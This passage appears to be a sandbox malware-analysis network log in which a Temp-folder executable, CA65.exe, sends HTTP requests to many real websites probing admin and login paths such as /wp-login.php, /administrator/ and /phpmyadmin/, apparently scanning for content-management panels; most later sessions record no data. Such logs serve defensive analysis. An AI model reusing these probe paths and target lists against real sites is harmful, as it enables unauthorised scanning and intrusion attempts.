69	192.168.2.4	55385	52.165.155.237	80	5660	C:\Users\user\AppData\Local\Temp\CA65.exe

Timestamp	Bytes transferred	Direction	Data
Dec 22, 2023 21:14:51.655652046 CET	184	OUT	GET /administrator/ HTTP/1.1 Host: intermountainmls.com Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
70	192.168.2.4	55413	104.17.71.73	80	5660	C:\Users\user\AppData\Local\Temp\CA65.exe

Timestamp	Bytes transferred	Direction	Data
Dec 22, 2023 21:14:51.655699015 CET	172	OUT	GET /wp-admin/ HTTP/1.1 Host: liberty25.org Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
71	192.168.2.4	55384	3.33.130.190	80	5660	C:\Users\user\AppData\Local\Temp\CA65.exe

Timestamp	Bytes transferred	Direction	Data
Dec 22, 2023 21:14:51.655700922 CET	177	OUT	GET /administrator/ HTTP/1.1 Host: yandfcorp.com Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
72	192.168.2.4	55412	34.205.242.146	80	5660	C:\Users\user\AppData\Local\Temp\CA65.exe

Timestamp	Bytes transferred	Direction	Data
Dec 22, 2023 21:14:51.655729055 CET	179	OUT	GET /wp-login.php HTTP/1.1 Host: keywordranker.com Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
73	192.168.2.4	55411	15.197.142.173	80	5660	C:\Users\user\AppData\Local\Temp\CA65.exe

Timestamp	Bytes transferred	Direction	Data
Dec 22, 2023 21:14:51.655764103 CET	172	OUT	GET /admin HTTP/1.1 Host: maroonshockey.org Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
74	192.168.2.4	55409	62.149.128.163	80	5660	C:\Users\user\AppData\Local\Temp\CA65.exe

Timestamp	Bytes transferred	Direction	Data
Dec 22, 2023 21:14:51.655801058 CET	177	OUT	GET /wp-login.php HTTP/1.1 Host: enricobassi.com Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
75	192.168.2.4	55408	35.168.67.138	80	5660	C:\Users\user\AppData\Local\Temp\CA65.exe

Timestamp	Bytes transferred	Direction	Data
Dec 22, 2023 21:14:51.655838013 CET	176	OUT	GET /administrator/ HTTP/1.1 Host: mcammond.net Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
76	192.168.2.4	55410	185.230.63.171	80	5660	C:\Users\user\AppData\Local\Temp\CA65.exe

Timestamp	Bytes transferred	Direction	Data
Dec 22, 2023 21:14:51.655841112 CET	182	OUT	GET /wp-login.php HTTP/1.1 Host: valentinegrowers.com Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
77	192.168.2.4	55406	205.178.132.70	80	5660	C:\Users\user\AppData\Local\Temp\CA65.exe

Timestamp	Bytes transferred	Direction	Data
Dec 22, 2023 21:14:51.655879021 CET	186	OUT	GET /administrator/ HTTP/1.1 Host: harrell-associates.com Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Dec 22, 2023 21:14:51.801419020 CET	229	IN	HTTP/1.1 404 Not Found Date: Fri, 22 Dec 2023 20:14:51 GMT Server: Apache Last-Modified: Thu, 26 Jul 2007 15:09:38 GMT ETag: "8d7ff8d4-2b5-4362c03e5f083" Accept-Ranges: bytes Content-Length: 693 Content-Type: text/html
Dec 22, 2023 21:14:51.801450014 CET	693	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 34 30 34 20 50 61 67 65 20 4e 6f Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><HTML><HEAD><TITLE>404 Page Not Found</TITLE><style type="text/css">...h1 { font-family:Verdana, Arial, Helvetica, sans-serif;font-size: 24px;color:#333333;line-height:19px;font

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
78	192.168.2.4	55407	34.136.28.237	80	5660	C:\Users\user\AppData\Local\Temp\CA65.exe

Timestamp	Bytes transferred	Direction	Data
Dec 22, 2023 21:14:51.655883074 CET	179	OUT	GET /administrator/ HTTP/1.1 Host: ispsolucoes.com Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
79	192.168.2.4	55405	216.194.166.146	80	5660	C:\Users\user\AppData\Local\Temp\CA65.exe

Timestamp	Bytes transferred	Direction	Data
Dec 22, 2023 21:14:51.655989885 CET	177	OUT	GET /administrator/ HTTP/1.1 Host: adm-works.com Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
80	192.168.2.4	56247	104.143.9.211	80	5660	C:\Users\user\AppData\Local\Temp\CA65.exe

Timestamp	Bytes transferred	Direction	Data
Dec 22, 2023 21:14:51.683463097 CET	172	OUT	GET /phpmyadmin/ HTTP/1.1 Host: buyhits.net Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
81	192.168.2.4	56298	3.33.130.190	80	5660	C:\Users\user\AppData\Local\Temp\CA65.exe

Timestamp	Bytes transferred	Direction	Data
Dec 22, 2023 21:14:51.727035046 CET	174	OUT	GET /phpmyadmin/ HTTP/1.1 Host: yandfcorp.com Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
82	192.168.2.4	56297	206.188.192.247	80	5660	C:\Users\user\AppData\Local\Temp\CA65.exe

Timestamp	Bytes transferred	Direction	Data
Dec 22, 2023 21:14:51.740566969 CET	181	OUT	GET /phpmyadmin/ HTTP/1.1 Host: sunbeltfinancial.com Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0

Session ID	Source IP	Source Port	Destination IP	Destination Port
83	192.168.2.4	56266	38.181.56.100	80

Timestamp	Bytes transferred	Direction	Data
Dec 22, 2023 21:14:51.745568991 CET	171	OUT	GET /phpmyadmin/ HTTP/1.1 Host: jiashi.com Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
84	192.168.2.4	56323	185.230.63.107	80	5660	C:\Users\user\AppData\Local\Temp\CA65.exe

Timestamp	Bytes transferred	Direction	Data
Dec 22, 2023 21:14:51.759071112 CET	174	OUT	GET /phpmyadmin/ HTTP/1.1 Host: pmcsystem.com Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
85	192.168.2.4	56288	107.158.136.76	80	5660	C:\Users\user\AppData\Local\Temp\CA65.exe

Timestamp	Bytes transferred	Direction	Data
Dec 22, 2023 21:14:51.768688917 CET	178	OUT	GET /phpmyadmin/ HTTP/1.1 Host: videolifeperu.com Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
86	192.168.2.4	56405	38.181.56.100	80	5660	C:\Users\user\AppData\Local\Temp\CA65.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
87	192.168.2.4	56572	192.185.183.254	80	5660	C:\Users\user\AppData\Local\Temp\CA65.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
88	192.168.2.4	56560	173.201.182.85	80	5660	C:\Users\user\AppData\Local\Temp\CA65.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
89	192.168.2.4	56411	141.193.213.10	80	5660	C:\Users\user\AppData\Local\Temp\CA65.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
90	192.168.2.4	56623	3.33.130.190	80	5660	C:\Users\user\AppData\Local\Temp\CA65.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
91	192.168.2.4	56412	192.252.151.25	80	5660	C:\Users\user\AppData\Local\Temp\CA65.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
92	192.168.2.4	56407	104.143.9.211	80	5660	C:\Users\user\AppData\Local\Temp\CA65.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
93	192.168.2.4	56726	3.33.130.190	80	5660	C:\Users\user\AppData\Local\Temp\CA65.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
94	192.168.2.4	56748	192.124.249.58	80	5660	C:\Users\user\AppData\Local\Temp\CA65.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
95	192.168.2.4	56745	192.185.183.254	80	5660	C:\Users\user\AppData\Local\Temp\CA65.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
96	192.168.2.4	56723	173.201.182.85	80	5660	C:\Users\user\AppData\Local\Temp\CA65.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
97	192.168.2.4	56414	38.177.197.58	80	5660	C:\Users\user\AppData\Local\Temp\CA65.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
98	192.168.2.4	56408	91.132.253.137	80	5660	C:\Users\user\AppData\Local\Temp\CA65.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
99	192.168.2.4	56410	218.213.216.3	80	5660	C:\Users\user\AppData\Local\Temp\CA65.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
100	192.168.2.4	56406	89.46.108.50	80	5660	C:\Users\user\AppData\Local\Temp\CA65.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
101	192.168.2.4	56981	104.21.69.169	80	5660	C:\Users\user\AppData\Local\Temp\CA65.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
102	192.168.2.4	56986	141.193.213.10	80	5660	C:\Users\user\AppData\Local\Temp\CA65.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
103	192.168.2.4	56987	199.59.243.225	80	5660	C:\Users\user\AppData\Local\Temp\CA65.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
104	192.168.2.4	56901	69.42.204.12	80	5660	C:\Users\user\AppData\Local\Temp\CA65.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
105	192.168.2.4	56941	52.165.155.237	80	5660	C:\Users\user\AppData\Local\Temp\CA65.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
106	192.168.2.4	56931	209.182.195.165	80	5660	C:\Users\user\AppData\Local\Temp\CA65.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
107	192.168.2.4	57057	3.33.130.190	80	5660	C:\Users\user\AppData\Local\Temp\CA65.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
108	192.168.2.4	56994	107.158.136.76	80	5660	C:\Users\user\AppData\Local\Temp\CA65.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
109	192.168.2.4	57058	192.124.249.58	80	5660	C:\Users\user\AppData\Local\Temp\CA65.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
110	192.168.2.4	56983	38.181.56.100	80	5660	C:\Users\user\AppData\Local\Temp\CA65.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
111	192.168.2.4	57060	205.178.132.70	80	5660	C:\Users\user\AppData\Local\Temp\CA65.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
112	192.168.2.4	57072	104.17.71.73	80	5660	C:\Users\user\AppData\Local\Temp\CA65.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
113	192.168.2.4	57059	15.197.142.173	80	5660	C:\Users\user\AppData\Local\Temp\CA65.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
114	192.168.2.4	57062	15.197.142.173	80	5660	C:\Users\user\AppData\Local\Temp\CA65.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
115	192.168.2.4	57070	34.206.39.153	80	5660	C:\Users\user\AppData\Local\Temp\CA65.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
116	192.168.2.4	57074	15.197.142.173	80	5660	C:\Users\user\AppData\Local\Temp\CA65.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
117	192.168.2.4	57205	192.252.151.25	80	5660	C:\Users\user\AppData\Local\Temp\CA65.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
118	192.168.2.4	57210	34.136.28.237	80	5660	C:\Users\user\AppData\Local\Temp\CA65.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
119	192.168.2.4	57310	13.248.169.48	80	5660	C:\Users\user\AppData\Local\Temp\CA65.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
120	192.168.2.4	57220	23.229.226.96	80	5660	C:\Users\user\AppData\Local\Temp\CA65.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
121	192.168.2.4	56602	34.206.39.153	80	5660	C:\Users\user\AppData\Local\Temp\CA65.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
122	192.168.2.4	57559	205.178.189.129	80	5660	C:\Users\user\AppData\Local\Temp\CA65.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
123	192.168.2.4	57586	66.254.66.55	80	5660	C:\Users\user\AppData\Local\Temp\CA65.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
124	192.168.2.4	57635	185.230.63.107	80	5660	C:\Users\user\AppData\Local\Temp\CA65.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
125	192.168.2.4	56883	62.149.128.163	80	5660	C:\Users\user\AppData\Local\Temp\CA65.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
126	192.168.2.4	56886	3.126.94.219	80	5660	C:\Users\user\AppData\Local\Temp\CA65.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
127	192.168.2.4	56929	217.146.69.50	80	5660	C:\Users\user\AppData\Local\Temp\CA65.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
128	192.168.2.4	56930	91.132.253.137	80	5660	C:\Users\user\AppData\Local\Temp\CA65.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
129	192.168.2.4	57211	213.186.33.19	80	5660	C:\Users\user\AppData\Local\Temp\CA65.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
130	192.168.2.4	57903	173.201.182.85	80	5660	C:\Users\user\AppData\Local\Temp\CA65.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
131	192.168.2.4	58116	3.33.130.190	80	5660	C:\Users\user\AppData\Local\Temp\CA65.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
132	192.168.2.4	58041	206.188.192.247	80	5660	C:\Users\user\AppData\Local\Temp\CA65.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
133	192.168.2.4	57979	38.181.56.100	80	5660	C:\Users\user\AppData\Local\Temp\CA65.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
134	192.168.2.4	57553	192.178.50.46	80	5660	C:\Users\user\AppData\Local\Temp\CA65.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
135	192.168.2.4	57543	185.162.89.66	80	5660	C:\Users\user\AppData\Local\Temp\CA65.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
136	192.168.2.4	58241	192.185.183.254	80	5660	C:\Users\user\AppData\Local\Temp\CA65.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
137	192.168.2.4	58240	209.182.195.165	80	5660	C:\Users\user\AppData\Local\Temp\CA65.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
138	192.168.2.4	57848	103.42.111.169	80	5660	C:\Users\user\AppData\Local\Temp\CA65.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
139	192.168.2.4	58299	192.124.249.58	80	5660	C:\Users\user\AppData\Local\Temp\CA65.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
140	192.168.2.4	58445	199.59.243.225	80	5660	C:\Users\user\AppData\Local\Temp\CA65.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
141	192.168.2.4	58446	141.193.213.10	80	5660	C:\Users\user\AppData\Local\Temp\CA65.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
142	192.168.2.4	58044	183.111.174.109	80	5660	C:\Users\user\AppData\Local\Temp\CA65.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
143	192.168.2.4	58495	192.252.151.25	80	5660	C:\Users\user\AppData\Local\Temp\CA65.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
144	192.168.2.4	58244	218.213.216.3	80	5660	C:\Users\user\AppData\Local\Temp\CA65.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
145	192.168.2.4	58546	192.185.183.254	80	5660	C:\Users\user\AppData\Local\Temp\CA65.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
146	192.168.2.4	58595	104.21.69.169	80	5660	C:\Users\user\AppData\Local\Temp\CA65.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
147	192.168.2.4	58604	206.188.192.247	80	5660	C:\Users\user\AppData\Local\Temp\CA65.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
148	192.168.2.4	58598	205.178.189.129	80	5660	C:\Users\user\AppData\Local\Temp\CA65.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
149	192.168.2.4	58603	192.178.50.46	80	5660	C:\Users\user\AppData\Local\Temp\CA65.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
150	192.168.2.4	58591	208.91.197.26	80	5660	C:\Users\user\AppData\Local\Temp\CA65.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
151	192.168.2.4	58541	38.181.56.100	80	5660	C:\Users\user\AppData\Local\Temp\CA65.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
152	192.168.2.4	57235	104.26.0.173	80	5660	C:\Users\user\AppData\Local\Temp\CA65.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
153	192.168.2.4	57061	107.158.136.76	80	5660	C:\Users\user\AppData\Local\Temp\CA65.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
154	192.168.2.4	57075	23.229.226.96	80	5660	C:\Users\user\AppData\Local\Temp\CA65.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
155	192.168.2.4	57063	185.230.63.107	80	5660	C:\Users\user\AppData\Local\Temp\CA65.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
156	192.168.2.4	58601	66.254.66.55	80	5660	C:\Users\user\AppData\Local\Temp\CA65.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
157	192.168.2.4	58605	173.201.182.85	80	5660	C:\Users\user\AppData\Local\Temp\CA65.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
158	192.168.2.4	58600	209.182.195.165	80	5660	C:\Users\user\AppData\Local\Temp\CA65.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
159	192.168.2.4	58216	156.38.230.76	80	5660	C:\Users\user\AppData\Local\Temp\CA65.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
160	192.168.2.4	58596	62.149.128.40	80	5660	C:\Users\user\AppData\Local\Temp\CA65.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
161	192.168.2.4	58550	68.178.145.3	80	5660	C:\Users\user\AppData\Local\Temp\CA65.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
162	192.168.2.4	58781	192.185.183.254	80	5660	C:\Users\user\AppData\Local\Temp\CA65.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
163	192.168.2.4	58782	205.178.189.129	80	5660	C:\Users\user\AppData\Local\Temp\CA65.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
164	192.168.2.4	58780	69.42.204.12	80	5660	C:\Users\user\AppData\Local\Temp\CA65.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
165	192.168.2.4	58794	173.201.182.85	80	5660	C:\Users\user\AppData\Local\Temp\CA65.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
166	192.168.2.4	58885	199.59.243.225	80	5660	C:\Users\user\AppData\Local\Temp\CA65.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
167	192.168.2.4	58865	66.254.66.55	80	5660	C:\Users\user\AppData\Local\Temp\CA65.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
168	192.168.2.4	59011	205.178.189.129	80	5660	C:\Users\user\AppData\Local\Temp\CA65.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
169	192.168.2.4	59070	104.21.52.80	80	5660	C:\Users\user\AppData\Local\Temp\CA65.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
170	192.168.2.4	59051	23.229.226.96	80	5660	C:\Users\user\AppData\Local\Temp\CA65.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
171	192.168.2.4	59245	104.21.69.169	80	5660	C:\Users\user\AppData\Local\Temp\CA65.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
172	192.168.2.4	59243	107.158.136.76	80	5660	C:\Users\user\AppData\Local\Temp\CA65.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
173	192.168.2.4	59385	185.230.63.107	80	5660	C:\Users\user\AppData\Local\Temp\CA65.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
174	192.168.2.4	59474	3.33.130.190	80	5660	C:\Users\user\AppData\Local\Temp\CA65.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
175	192.168.2.4	59478	104.24.82.4	80	5660	C:\Users\user\AppData\Local\Temp\CA65.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port
176	192.168.2.4	59480	3.33.130.190	80

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
177	192.168.2.4	59477	50.31.65.5	80	5660	C:\Users\user\AppData\Local\Temp\CA65.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
178	192.168.2.4	59489	192.185.183.254	80	5660	C:\Users\user\AppData\Local\Temp\CA65.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
179	192.168.2.4	59482	192.252.151.25	80	5660	C:\Users\user\AppData\Local\Temp\CA65.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
180	192.168.2.4	59475	173.201.182.85	80	5660	C:\Users\user\AppData\Local\Temp\CA65.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
181	192.168.2.4	59472	213.186.33.19	80	5660	C:\Users\user\AppData\Local\Temp\CA65.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
182	192.168.2.4	59471	62.149.128.40	80	5660	C:\Users\user\AppData\Local\Temp\CA65.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
183	192.168.2.4	59594	192.124.249.58	80	5660	C:\Users\user\AppData\Local\Temp\CA65.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
184	192.168.2.4	59597	206.188.192.247	80	5660	C:\Users\user\AppData\Local\Temp\CA65.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
